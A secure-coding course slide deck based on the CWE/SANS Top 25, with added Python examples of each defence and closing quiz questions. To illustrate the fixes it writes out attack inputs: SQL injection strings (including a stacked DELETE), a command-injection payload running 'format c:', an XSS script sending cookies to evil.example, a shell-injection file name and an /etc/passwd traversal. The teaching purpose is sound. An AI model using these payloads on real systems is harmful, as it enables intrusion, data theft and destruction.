Slide 1
Secure Software: Professional Recommendations from CWE/SANS
Slide 2
References
Material is from: 2009 CWE/SANS Top 25 Most Dangerous Programming Errors, Version 1.4, Oct 29, 2009; CISA Certified Information Systems Auditor All-in-One Exam Guide, Peter H. Gregory, McGraw-Hill.
Author: Susan J Lincke, PhD Univ. of Wisconsin-Parkside
Contributors: Megan Reid, Todd Burri
Funded by National Science Foundation (NSF) Course, Curriculum and Laboratory Improvement (CCLI) grant 0837574: Information Security: Audit, Case Study, and Service Learning.
Any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and/or source(s) and do not necessarily reflect the views of the National Science Foundation.
Slide 3
Objectives
Define attacks: buffer overflow, SQL injection, OS command injection, cross-site scripting, cleartext transmission, race condition, chatty error message
Define solutions: sanitization, whitelist, blacklist, nonce, character encoding (UTF-8), jail or sandbox environment
Recognize major coding errors
Modify a Requirements Document to include Security Requirements
Slide 4
Problem: Incorrect Input
Car Sale
Model: Chevrolet XR2
Price $: 25.45
VIN: 12K4FG436DDE842
Status: New
Sale to: Rubber Ducky, 2222 Atlantic Ocean, Antarctica, NY, 00000
Phone: 911
VISA: RUAFOOL444
Every field has the right shape (text where text is expected, a number where a number is expected) yet none of them is plausible: a $25.45 car, a 15-character VIN, an emergency number as a phone and a non-numeric card number. Type checks alone do not catch this; business rules must be checked too.
Slide 5
Problem: Buffer overflow
[Stack diagram: local variables Name ("Zzzzzzzzzz"), Count (49,425,222) and State (84), with the saved frame pointer (0x246625) and return address (0x246625) above them]
Enter Name: Zzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzz
A name longer than its buffer spills into the neighbouring variables (Count and State now hold garbage) and, if long enough, overwrites the saved frame pointer and return address, letting the attacker redirect execution.
Slide 6
Fix: Input Validation
Assume all input is malicious! Validate:
Length
Type
Syntax
Context: business rules
Or use special input checkers: Struts or OWASP ESAPI Validation API
Whitelist: list of acceptable input
Blacklist: reject suspect input
Validate first!!!
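The four checks above (length, type, syntax, business rules), applied as a whitelist to the car-sale record from Slide 4. This is an added example, not code from the slides or from CWE/SANS; the catalogue of models, the US phone format and the 64-character field cap are assumptions made for the demonstration.

```python
import re
from decimal import Decimal, InvalidOperation

# Whitelist rules: each pattern describes what IS acceptable, so anything
# unexpected fails closed. (Assumed formats, chosen for this example.)
VIN_RE = re.compile(r"^[A-HJ-NPR-Z0-9]{17}$")        # 17 chars, never I, O or Q
PHONE_RE = re.compile(r"^\d{3}-\d{3}-\d{4}$")       # assumed US format NNN-NNN-NNNN
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z' -]{0,39}$")
KNOWN_MODELS = {"Chevrolet XR2", "Chevrolet XR3"}   # constructed catalogue
STATUSES = {"New", "Used"}
EXPECTED_FIELDS = {"model", "price", "vin", "status", "name", "phone", "card"}


def luhn_ok(digits: str) -> bool:
    """Luhn checksum used by payment card numbers (syntax check for 'card')."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def validate_sale(form: dict) -> list:
    """Return the list of validation failures; an empty list means accept."""
    errors = []
    # Whitelist the field set itself: unknown keys are rejected, not ignored.
    extra = set(form) - EXPECTED_FIELDS
    if extra:
        errors.append("unexpected fields: %s" % sorted(extra))
    # Length and type first, before any parsing touches the value.
    for key in EXPECTED_FIELDS:
        value = form.get(key)
        if not isinstance(value, str) or not (1 <= len(value) <= 64):
            errors.append(key + ": missing, wrong type or bad length")
    if errors:
        return errors
    # Syntax and business rules per field.
    if form["model"] not in KNOWN_MODELS:
        errors.append("model: not in catalogue")
    try:
        price = Decimal(form["price"])
        # Business rule: a car price has a plausible range, not just a numeric type.
        if not (Decimal("1000") <= price <= Decimal("500000")):
            errors.append("price: outside plausible range")
    except InvalidOperation:
        errors.append("price: not a decimal number")
    if not VIN_RE.match(form["vin"].upper()):
        errors.append("vin: must be 17 characters without I, O or Q")
    if form["status"] not in STATUSES:
        errors.append("status: unknown value")
    if not NAME_RE.match(form["name"]):
        errors.append("name: invalid characters or length")
    if not PHONE_RE.match(form["phone"]):
        errors.append("phone: expected NNN-NNN-NNNN")
    card = form["card"].replace(" ", "")
    if not (card.isdigit() and 13 <= len(card) <= 19 and luhn_ok(card)):
        errors.append("card: not a valid card number")
    return errors


# The record from Slide 4 and a plausible one, constructed as sample input.
SLIDE_SALE = {
    "model": "Chevrolet XR2", "price": "25.45", "vin": "12K4FG436DDE842",
    "status": "New", "name": "Rubber Ducky", "phone": "911",
    "card": "RUAFOOL444",
}
GOOD_SALE = {
    "model": "Chevrolet XR2", "price": "25450.00", "vin": "1HGCM82633A004352",
    "status": "New", "name": "Ann Winkler", "phone": "262-595-2111",
    "card": "4111 1111 1111 1111",
}

if __name__ == "__main__":
    print(validate_sale(SLIDE_SALE))
    print(validate_sale(GOOD_SALE))
```

The slide's record fails on price, VIN, phone and card while the plausible record passes. Note the order: size and type are checked before anything is parsed, which is also the defence against the oversized Name of Slide 5.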
Slide 7
Problem: Insecure Interaction Between Components
[Diagram: the real client (Program B) and a modified copy (Program B*) both talk to the server over the network; the server cannot tell them apart]
Problem: Server assumes validation occurred in the client and does not recheck
Attack: Client code is reverse engineered and modified to act differently.
Slide 8
Fix: Server-Side Authentication
Perform authentication and input validation on both client and server sides; only the server-side check can be trusted, the client-side check is a convenience for honest users
Use encryption & a hash (integrity check) between client & server
[Diagram: real client -> network -> server]
Slide 9
Problem: SQL Injection
Java original (query built by string concatenation):
    "SELECT * FROM users_table WHERE username='" + username + "' AND password='" + password + "'"
Inserted password: Aa' OR ''='
Result: SELECT * FROM users_table WHERE username='anyname' AND password='Aa' OR ''=''
(the OR clause is always true, so the login succeeds without a valid password)
Inserted password: foo'; DELETE FROM users_table WHERE username LIKE '%
Result: SELECT * FROM users_table WHERE username='anyname' AND password='foo'; DELETE FROM users_table WHERE username LIKE '%'
(a second, attacker-chosen statement is executed)
[Login form: Login / Password; response: Welcome to My System]
Slide 10
Fix: Input Sanitization
Avoid dynamically-constructed query strings; use parameterized queries (prepared statements) so data never becomes SQL text
Disallow meta-characters
Persistence software: Oracle DBMS_ASSERT; MySQL mysql_real_escape_string() for C, PHP
Hibernate or Enterprise Java Beans, if used properly
[Layered diagram: GUI (validation) -> Business Logic -> Persistence Layer -> Database]
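The slide's first payload run against both query styles, as an added example (not the slides' Java code): the concatenated query from Slide 9 beside a parameterized one, using Python's standard sqlite3 driver and a constructed in-memory users_table. The plaintext password column mirrors the slide only; real systems store password hashes.

```python
import sqlite3

PAYLOAD = "Aa' OR ''='"   # the slide's first injected password


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users_table with one account (plaintext, as on the slide)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users_table (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users_table VALUES ('anyname', 'secret-pw')")
    conn.commit()
    return conn


def login_concatenated(conn, username: str, password: str) -> bool:
    """The vulnerable pattern from Slide 9: input is spliced into the SQL text."""
    query = ("SELECT * FROM users_table WHERE username='" + username +
             "' AND password='" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username: str, password: str) -> bool:
    """Hardened: the SQL text is fixed; values are bound as parameters, never parsed as SQL."""
    query = "SELECT * FROM users_table WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    print("concatenated + payload :", login_concatenated(conn, "anyname", PAYLOAD))
    print("parameterized + payload:", login_parameterized(conn, "anyname", PAYLOAD))
```

With the payload, the concatenated query becomes `... AND password='Aa' OR ''=''` and returns the row; the parameterized query compares the literal string `Aa' OR ''='` against the stored password and returns nothing. The slide's stacked DELETE payload is not reproduced here because Python's sqlite3 refuses more than one statement per execute() call; other drivers do allow stacked statements, and parameterization stops that case too.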
Slide 11
Problem: OS Command Injection
Problem: command injection into SQL
Inserts: '|shell("cmd /c echo " & char(124) & "format c:")|'
Data and control can traverse the same path
[Login form: Login / Password; response: Welcome to My System]
Slide 12
Fix: Avoid OS Command Injection
Separate control information from data information, e.g. data -> database, control defines application
Use library calls instead of external processes
Avoid external control of command input
Run code in a "jail" or other sandbox environment (discussed in further detail on the next slide)
Provide the lowest possible permissions for the executable
Control: Start WPI session, parms -lmk
Data: "Terry, Brian, Jerry, Ann, Louis, ..."
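The "library call instead of external process" and "avoid external control of command input" points, shown side by side in an added example (not from the slides). The file-size task, the `ls` command and the whitelist pattern for file names are assumptions; the scenario runs against a temporary directory created by the example itself on a POSIX system.

```python
import os
import re
import subprocess
import tempfile

# Whitelist for a bare file name: alphanumeric start, then a limited alphabet.
# Rejects separators, quotes, ';', '|', '$' and '..' by construction (assumed rule).
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def size_via_shell(path: str) -> str:
    """Vulnerable pattern: user data is spliced into a shell command line."""
    result = subprocess.run("ls -l " + path, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def size_via_library(base_dir: str, name: str) -> int:
    """Hardened: validate the name, then use a library call (no process at all)."""
    if not SAFE_NAME.match(name):
        raise ValueError("rejected file name")
    return os.stat(os.path.join(base_dir, name)).st_size


def list_via_argv(base_dir: str, name: str) -> int:
    """If an external tool is unavoidable: validated name, argv list, no shell.
    Each argument reaches the program as one argv entry; no shell parses metacharacters."""
    if not SAFE_NAME.match(name):
        raise ValueError("rejected file name")
    result = subprocess.run(["ls", "-l", "--", os.path.join(base_dir, name)],
                            shell=False, capture_output=True, text=True)
    return result.returncode


def demo() -> dict:
    """Constructed scenario: a 5-byte file plus an injection attempt against each variant."""
    base = tempfile.mkdtemp()
    with open(os.path.join(base, "report.txt"), "wb") as fh:
        fh.write(b"hello")
    injected = "report.txt; echo INJECTED"   # control smuggled inside 'data'
    results = {
        "shell_injected": "INJECTED" in size_via_shell(os.path.join(base, injected)),
        "library_size": size_via_library(base, "report.txt"),
        "argv_ok": list_via_argv(base, "report.txt") == 0,
    }
    try:
        size_via_library(base, injected)
        results["library_rejected"] = False
    except ValueError:
        results["library_rejected"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

The shell variant echoes INJECTED because `;` ends the intended command and starts the attacker's; the library variant never spawns a process and rejects the name outright; the argv variant keeps the separation between control (the program and its fixed flags) and data (one argument) that the slide asks for.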
Slide 13
Define Jail & Sandbox
Jail: the OS imposes resource limits on programs. It may include I/O bandwidth caps, disk quotas, network access restrictions and a restricted file system namespace.
Sandbox: quarantines an untrusted program as it runs. Allows execution of untested/untrusted programs from untrusted third parties, suppliers, and users.
Slide 14
Problem: External Control of Critical State Data
User-side data can be modified: cookies, configuration files, profiles, hidden form fields, environment variables, registry keys
[Diagram: web request -> web form -> form returned with fake data]
Slide 15
Fix: Control Critical State Data
Understand all locations that are accessible to attackers
Do not keep state info on the client without using encryption and integrity checking (e.g. HMAC)
Prefer storing state on the server side; where a framework keeps state on the client (e.g. ASP.NET View State), rely on its built-in MAC and encryption, or use a session manager such as OWASP ESAPI Session Mgmt
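Integrity checking of client-held state with an HMAC, as recommended on this slide and on Slide 8 ("hash between client & server"). Added example, not from the slides: the token layout (base64 body, a dot, a hex SHA-256 HMAC tag) and the per-process key are assumptions; in a real deployment the key comes from a secret store and never from the client.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Server-only key. Generated per process here; assumed to come from a secret store in practice.
SERVER_KEY = secrets.token_bytes(32)


def _encode_body(state: dict) -> str:
    return base64.urlsafe_b64encode(json.dumps(state, sort_keys=True).encode()).decode()


def seal(state: dict, key: bytes = SERVER_KEY) -> str:
    """Hand state to the client with an HMAC tag over the exact bytes sent."""
    body = _encode_body(state)
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return body + "." + tag


def unseal(token: str, key: bytes = SERVER_KEY):
    """Return the state if the tag verifies, else None. Never trust the body before the check."""
    try:
        body, tag = token.split(".", 1)
    except ValueError:
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):     # constant-time comparison
        return None
    return json.loads(base64.urlsafe_b64decode(body))


def tamper(token: str) -> str:
    """What an attacker does to a hidden field or cookie: rewrite the body, keep the tag."""
    body, tag = token.split(".", 1)
    state = json.loads(base64.urlsafe_b64decode(body))
    state["price"] = "25.45"                          # the Slide 4 price
    return _encode_body(state) + "." + tag


ORDER_STATE = {"user": "ann", "price": "25450.00", "role": "normal"}   # constructed

if __name__ == "__main__":
    token = seal(ORDER_STATE)
    print(unseal(token))
    print(unseal(tamper(token)))
```

An HMAC gives integrity, not secrecy: anyone holding the token can read the body, so encrypt as well if the state is confidential. It also does not stop replay of an old, still-valid token; that needs an expiry or a nonce in the sealed state, which is the subject of Slide 23.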
Slide 16
Problem: Insecure Interaction Between Components
Web servers are memoryless (HTTP is stateless): they do not remember sending a form to a client, what type it was or what info it contained
Client side can remove checks, insert other code, return unexpected data, etc.
[Diagram: web access -> web form with JavaScript; the client modifies the JavaScript to avoid the error checks and returns a revised form with data and JavaScript]
Slide 17
Problem: Cross-Site Scripting
A reputable site unknowingly carries links or input supplied by a disreputable site
The disreputable site supplies a JavaScript or VBScript, which gets inserted into the reputable company's HTML response.
The result looks like a valid web page from the reputable company.
E.g.: Error: Page not found
[Diagram: web access to a product link -> web form with a JavaScript attack reference; the response should be an error (Not Found), instead a fake form is returned]
Slide 18
Fix: Preserve Web Page Structure
Specify a strong character encoding such as UTF-8 or ISO-8859-1; encode on output, check on input
Or use other encoders: MS Anti-XSS library, OWASP ESAPI Encoding, Apache Wicket
Validate not only input data, but all parts of the HTTP input (headers, cookies, URL, hidden fields).
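Output encoding for the HTML text and attribute contexts, as an added example (not from the slides) using Python's standard html module. The greeting page, the link renderer and the cookie-stealing payload are constructed for the demonstration.

```python
import html

# Constructed attack string of the kind Slide 17 describes.
PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'


def render_greeting_unsafe(name: str) -> str:
    """Vulnerable: untrusted text is concatenated straight into the HTML body."""
    return "<p>Hello, " + name + "</p>"


def render_greeting(name: str) -> str:
    """Hardened: encode for the HTML text context; < > & become entities."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def render_link(label: str, url: str) -> str:
    """Attribute context: encode quotes too (quote=True) and whitelist the URL scheme,
    since encoding alone does not stop a javascript: URL from executing."""
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    return ('<a href="' + html.escape(url, quote=True) + '">'
            + html.escape(label, quote=True) + '</a>')


if __name__ == "__main__":
    print(render_greeting_unsafe(PAYLOAD))
    print(render_greeting(PAYLOAD))
    print(render_link("profile", "javascript:alert(1)"))
```

The encoder must match the context the data lands in: HTML body, attribute value, JavaScript string and URL each have different dangerous characters, which is why the slide recommends a library (ESAPI Encoding, Anti-XSS) rather than one hand-written escape routine.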
Slide 19
Problem: Forgery (also known as Cross-Site Request Forgery)
[Diagram: web access -> web form with JavaScript; a fake form with data and JavaScript is submitted in place of the real form]
Slide 20
Problem: Improper Access Control
[Diagram: a web form that needs authentication replies to www.abc.com/123 with an authenticated web reply; a later web request for www.abc.com/345 is answered with the actual data for www.abc.com/345 from a cache, without re-checking authorization]
Slide 21
Fix: Access Permissions
Use role-based access; at least the permissions anonymous, normal, privileged, administrative
Verify access control at the server side
Sensitive pages are never cached and must have an active authorization token
Only provide higher level access when you need it; always run with the minimum possible authorization level
Check that files read have the required access level permissions; administrators may not set them properly.
Use a good random number generator when generating random session keys; if they are not random, attackers will figure out the next key sequence
Slide 22
Problem: Incorrect Access Permissions
[Diagram: a database program used by three roles (Sales, Accounting, Manufacturing) through five forms: Sell on Web, Sell to Distributor, Adjust Price, Add Inventory, Ship Order]
What permissions to use for these forms???
Slide 23
Fix: Prevent Forgery
Use a nonce for each form (a number or CAPTCHA generated for a specific use, such as session authentication)
Verifier not predictable
If dangerous operation, send a separate confirmation request
[Example form: Name: Ann Winkler; Address: 2526 Pratt Ave, Racine WI; Phone: 262-595-2111; Interests: Horses, Movies, Travel; Security Code: Johnson Rivers (CAPTCHA); Submit]
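A per-form nonce as an anti-forgery token, added here as an example (not from the slides): the server issues an unpredictable value when it renders the form, keeps it in the session, and accepts a submission only if the same value comes back, once. The Session class, the form name "profile" and the handler are assumptions for the demonstration.

```python
import hmac
import secrets


class Session:
    """Server-side session state (assumed store); tokens never live only on the client."""
    def __init__(self):
        self.csrf_tokens = {}   # form name -> the one token currently valid for it


def issue_form_token(session: Session, form_name: str) -> str:
    """Called when the form is rendered: the nonce goes into a hidden field."""
    token = secrets.token_urlsafe(32)          # CSPRNG: not predictable
    session.csrf_tokens[form_name] = token
    return token


def verify_form_token(session: Session, form_name: str, submitted) -> bool:
    """Called on submit. pop() makes the nonce single-use, so a replayed form fails."""
    expected = session.csrf_tokens.pop(form_name, None)
    if expected is None or not isinstance(submitted, str):
        return False
    return hmac.compare_digest(expected, submitted)


def handle_profile_update(session: Session, posted: dict) -> str:
    """The protected action: a forged form from another site cannot know the nonce."""
    if not verify_form_token(session, "profile", posted.get("csrf_token")):
        return "rejected: missing or stale form token"
    return "updated profile for " + posted["name"]


if __name__ == "__main__":
    s = Session()
    token = issue_form_token(s, "profile")
    real_form = {"name": "Ann Winkler", "csrf_token": token}
    print(handle_profile_update(s, real_form))       # accepted
    print(handle_profile_update(s, real_form))       # replay: rejected
    print(handle_profile_update(s, {"name": "Mallory"}))   # forged: rejected
```

The attacker's page can make the victim's browser send the form, but it cannot read the nonce out of the victim's page, so the submission fails. For the "dangerous operation" case the slide mentions, the separate confirmation request would carry its own fresh nonce.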
Slide 24
Problem: Cleartext Transmission of Sensitive Info
Fix: Encrypt data with standard, reliable encryption before transmission
[Diagram: "Login: Ginger Password: Snap" sent over the network in the clear]
Slide 25
Problem: Race Condition

    Thread P1        Thread P2        Comment
    cin >> input;    ..               // read "hello" into global input
    ..               cin >> input;    // read "good-bye" into global input
    out = input;     out = input;     // string copy (e.g. with strcpy())
    cout << out;     ..               // prints "good-bye"
    ..               cout << out;     // prints "good-bye"

Result: data corruption & denial of service
Fix: Use synchronization primitives around critical code. Minimize use of shared resources. Test using artificial delays in the race window. Identify and trigger error conditions.
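A check-then-act race with the slide's own testing advice applied: an artificial delay inside the race window makes the corruption reproducible, and a lock around the critical section removes it. Added example, not from the slides; the bank-account scenario and the 0.1 s delay are constructed.

```python
import threading
import time


class Account:
    """Constructed shared resource. The race is between the balance check and the update."""
    def __init__(self, balance: int, lock=None):
        self.balance = balance
        self.lock = lock

    def withdraw(self, amount: int, delay: float = 0.1) -> bool:
        if self.balance >= amount:
            time.sleep(delay)          # artificial delay: widens the race window for testing
            self.balance -= amount
            return True
        return False

    def withdraw_locked(self, amount: int, delay: float = 0.1) -> bool:
        # Synchronization primitive around the whole critical section (check AND act).
        with self.lock:
            return self.withdraw(amount, delay)


def run_two(method, amount: int = 80) -> list:
    """Two threads race for the same money; returns their success flags."""
    results = [None, None]

    def worker(i):
        results[i] = method(amount)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(2)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def demo_unlocked() -> tuple:
    acct = Account(100)
    flags = run_two(acct.withdraw)
    return acct.balance, flags           # both withdrawals pass the check: balance goes negative


def demo_locked() -> tuple:
    acct = Account(100, threading.Lock())
    flags = run_two(acct.withdraw_locked)
    return acct.balance, flags           # second thread sees the updated balance and is refused


if __name__ == "__main__":
    print("unlocked:", demo_unlocked())
    print("locked:  ", demo_locked())
```

Without the delay the race may only show up once in thousands of runs, which is why the slide says to inject delays when testing. The lock is placed around the check and the update together; locking only the subtraction would still let both threads pass the check.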
Slide 26
Problem: Chatty Error Messages
"Cannot find file: C:/users/Lincke/validation.txt"
"Invalid password for login ID"
"Lab.cs.uwp.edu error: divide by zero error"
Fix: Error messages should avoid file, network configuration, and PII information. They must still be helpful to the user. Remove debug info before release.
Slide 27
Problem: External Control of Path
If you download an external file or navigate to a URL and execute it; if you provide access to a file on your system
Attacker can insert ../../ and access files outside their privilege.
Fix: Run as a low-privilege user. Provide fixed input values. Run code in a 'jail': Unix chroot jail and AppArmor.
[Form: Submit File: Enter pathname: [Browse]]
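The path check that stops the ../../ traversal on this slide, combined with the error-message rule from Slide 26: the user sees a generic message with a reference number, the details go to the server log only. Added example, not from the slides; the file-serving function, the log format and the temporary directory it creates for itself are constructed.

```python
import logging
import os
import tempfile
import uuid

logger = logging.getLogger("fileserve")


def safe_join(base_dir: str, user_path: str) -> str:
    """Resolve user_path under base_dir; raise ValueError if the result escapes it.
    realpath() collapses '..' and follows symlinks, so the check is on the final target."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes base directory: %r" % user_path)
    return target


def serve_file(base_dir: str, user_path: str) -> tuple:
    """Return (status, body_or_message). The user-facing message never names a path."""
    try:
        with open(safe_join(base_dir, user_path), "rb") as fh:
            return 200, fh.read()
    except (ValueError, OSError) as exc:
        ref = uuid.uuid4().hex[:8]
        # Full detail for the operator, keyed by the reference the user receives.
        logger.warning("ref=%s path=%r error=%s", ref, user_path, exc)
        return 404, "File not available (reference %s)" % ref


def make_demo_dir() -> str:
    """Constructed document root containing one file, hello.txt."""
    base = tempfile.mkdtemp()
    with open(os.path.join(base, "hello.txt"), "wb") as fh:
        fh.write(b"hi")
    return base


if __name__ == "__main__":
    base = make_demo_dir()
    print(serve_file(base, "hello.txt"))
    print(serve_file(base, "../../../etc/passwd"))
    print(serve_file(base, "/etc/passwd"))
```

An absolute path is handled as well: os.path.join discards the base when the user supplies a leading slash, so the realpath comparison is what catches it, not a check for ".." in the string.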
Slide 28
Problem: Adopting Untrusted Software
Fix: Use monitoring tools that examine processes as they interact with the OS: truss (Solaris), strace (Linux), FileMon, RegMon and Process Monitor (Sysinternals, Windows); sniffers and protocol analyzers for the network side
[Diagram: Download File. Free Software ... Is it Safe?]
Slide 29
Problem: Other Security Errors
Find the errors:

    Security() {
        String contents, environment;
        String spath = "security.dat";
        File security = new File();
        if (security.open(spath) > 0) {
            contents = security.read();
            environment = security.read();
        } else
            print("Error: Security.dat not found");
    }
Slide 30
Problem: Other Security Errors
Find the errors:

    Security() {
        String contents, environment;
        String spath = "security.dat";
        File security = new File();
        if (security.open(spath) > 0) {
            contents = security.read();
            environment = security.read();
        } else
            print("Error: Security.dat not found");
    }

1. Variables contents & environment are not initialized. This can cause problems on some execution paths (they are used later even when the open fails), and an attacker may be able to supply or read values left over from a previous use.
2. "security.dat" is not a full pathname. The file can be replaced if the program is run from another location.
3. File 'security' is not closed. This leaves the file open to attack and keeps unnecessary resources busy.
4. The error message reveals the file name, which can give an attacker important information.
Slide 31
Problem: More Security Errors
Find the errors:

    purchaseProduct() {
        password = "N23m**2d3";
        count = form.quantity;          // input
        total = count * product.cost();
        Message m = new Message(name, password, product, total);
        m.myEncrypt();
        server.send(m);
    }
Slide 32
Problem: More Security Errors
Find the errors:

    purchaseProduct() {
        password = "N23m**2d3";
        count = form.quantity;          // input
        total = count * product.cost();
        Message m = new Message(name, password, product, total);
        m.myEncrypt();
        server.send(m);
    }

Errors:
1. The password is hard-coded. If an attacker finds it, every installation can be broken into until the software is changed on all computers. Passwords may only be stored in an encrypted file.
2. The total may overflow (wrap around), producing a small or negative number. The input quantity is not checked (it could be zero, negative or invalid).
3. Encryption should use a standard algorithm. A home-written variety can be broken easily.
Slide 33
Fix: Test All Software!!!
Dynamic tools: use large test suites such as fuzz testing, robustness testing, and fault injection. Software may slow down but should not crash or generate incorrect results.
Use automated static analysis tools, e.g. the warnings of program analysis tools.
Use manual tests such as penetration testing, threat modeling, and interactive tools to reach beyond automated testing tools.
Run the program under low memory conditions, insufficient privileges, interrupt a transaction or disable connectivity before a transaction completes.
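Fuzz testing in miniature, as an added example (not from the slides): a mutation fuzzer runs thousands of corrupted inputs through a parser and records anything that is not a clean rejection. The record format (a count byte followed by length-prefixed fields), the unchecked parser and the hardened one are all constructed for the demonstration; the fuzzer is seeded so the run is repeatable.

```python
import random


def encode_record(fields: list) -> bytes:
    """Constructed wire format: count byte, then (length byte, payload) per field."""
    out = bytes([len(fields)])
    for f in fields:
        out += bytes([len(f)]) + f
    return out


def parse_record_buggy(data: bytes) -> list:
    """No bounds checks: crashes with IndexError on truncation and silently
    returns shortened payloads when the declared length exceeds the data."""
    count = data[0]
    fields, pos = [], 1
    for _ in range(count):
        length = data[pos]
        fields.append(bytes(data[pos + 1:pos + 1 + length]))
        pos += 1 + length
    return fields


def parse_record(data: bytes) -> list:
    """Hardened: every read is bounds-checked; malformed input gets one clean ValueError."""
    if not data:
        raise ValueError("empty record")
    count, pos, fields = data[0], 1, []
    for _ in range(count):
        if pos >= len(data):
            raise ValueError("truncated: missing length byte")
        end = pos + 1 + data[pos]
        if end > len(data):
            raise ValueError("truncated: payload shorter than declared")
        fields.append(data[pos + 1:end])
        pos = end
    if pos != len(data):
        raise ValueError("trailing bytes after last field")
    return fields


def fuzz(parser, seed_input: bytes, iterations: int = 2000, seed: int = 1) -> dict:
    """Mutate seed_input (bit flips, truncation, insertion, deletion) and count
    exceptions other than ValueError, keyed by exception type."""
    rng = random.Random(seed)
    crashes = {}
    for _ in range(iterations):
        data = bytearray(seed_input)
        for _ in range(rng.randint(1, 3)):
            op = rng.choice(("flip", "truncate", "insert", "delete"))
            if op == "flip" and data:
                i = rng.randrange(len(data))
                data[i] ^= 1 << rng.randrange(8)
            elif op == "truncate" and data:
                del data[rng.randrange(len(data)):]
            elif op == "insert":
                data.insert(rng.randrange(len(data) + 1), rng.randrange(256))
            elif op == "delete" and data:
                del data[rng.randrange(len(data))]
        try:
            parser(bytes(data))
        except ValueError:
            pass                      # clean rejection is the expected behaviour
        except Exception as exc:      # anything else is a crash the fuzzer found
            name = type(exc).__name__
            crashes[name] = crashes.get(name, 0) + 1
    return crashes


SEED_RECORD = encode_record([b"Ann", b"Winkler", b"262-595-2111"])   # constructed

if __name__ == "__main__":
    print("buggy   :", fuzz(parse_record_buggy, SEED_RECORD))
    print("hardened:", fuzz(parse_record, SEED_RECORD))
```

The buggy parser also illustrates the slide's "incorrect results" point: fed a record missing its last three bytes, it returns the phone number as "262-595-2" without complaint, whereas the hardened parser rejects the record.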
Slide 34
Definition Matching
Whitelist
Blacklist
Nonce
Jail
Sandbox Environment
1. A set of resource limits imposed on programs by the operating system kernel (e.g. I/O bandwidth caps & disk quotas).
2. Uses a time-sensitive mark to prevent packet replay (e.g. CAPTCHA)
3. List of acceptable input
4. A security mechanism for quarantining untrusted running programs.
5. Reject suspect input
Slide 36
Question
A third party inserts attack data into another organization's HTML response. This is known as:
1. Cross-Site Scripting
2. Blacklist
3. Race Condition
4. Cleartext
Slide 37
Question
What technique would NOT be appropriate in avoiding OS Command Injection?
1. Separate control information from data information
2. Use library calls instead of external processes
3. Run code in “jail” or other sandbox environment
4. Use a hard-coded password to enable access
Slide 38
Question
Which of the following is true concerning web servers?
1. Servers cannot retain web session state, and thus the client must do it
2. The single best place to do input validation and authentication is at the client-side
3. Using client as storage is safe if encryption and integrity checking are used
4. The server can trust web input if it validates the data in the web form
Slide 39
Question
The BEST way to ensure input validity at the client is:
1. Nonce
2. Whitelist
3. Blacklist
4. Integrity Checking
Slide 40
Question
The BEST implementation of Access Control would be:
1. Do not provide caches for sensitive data
2. Always use minimal possible permissions in code, for as short of a time as possible
3. Avoid using cookies and hidden fields
4. Never provide an authorization above ‘guest’ to web users
Slide 41
Question
SQL Injection is BEST protected against by using:
1. Cleartext
2. Encryption and Integrity Checking
3. Sanitization
4. A clearly defined character encoding such as UTF-8
Slide 42
Question
The main way to avoid replay between a client and server is:
1. Integrity checking
2. Whitelist
3. Blacklist
4. Nonce
Slide 43
Question
An attack that could cause the MOST problems includes:
1. Hard-coded password
2. Race condition
3. Denial of Service
4. Chatty error message
Slide 44
Question
The BEST way to ensure no message modification occurs is:
1. Hashing
2. Whitelist
3. Blacklist
4. Encryption
Slide 45
Question
All of the following EXCEPT which answer can result in invalid data AND break-in?
1. Non-random random number generator
2. Buffer overflow
3. Uninitialized variables resulting in error messages
4. Race conditions